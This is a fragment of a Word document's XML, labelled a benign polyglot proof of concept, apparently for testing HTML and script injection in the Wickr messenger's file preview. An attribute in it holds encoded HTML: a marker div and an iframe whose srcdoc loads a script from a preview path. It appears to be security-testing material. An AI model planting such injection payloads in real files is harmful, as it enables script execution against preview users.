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Wickr polyglot PoC (benign).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:sym w:font="Symbol" w:char="0;&lt;div style=&quot;border:2px solid green;padding:6px;font-family:sans-serif&quot;&gt;HTMLi OK - polyglot test frame below (red banner on top = JS exec):&lt;/div&gt;&lt;iframe srcdoc=&quot;&amp;lt;script src=&amp;quot;/preview-file/x.js&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;&quot; style=&quot;width:90%;height:120px;border:2px solid red&quot;&gt;&lt;/iframe&gt;"/>
      </w:r>
    </w:p>
    <w:sectPr/>
  </w:body>
</w:document>
</file>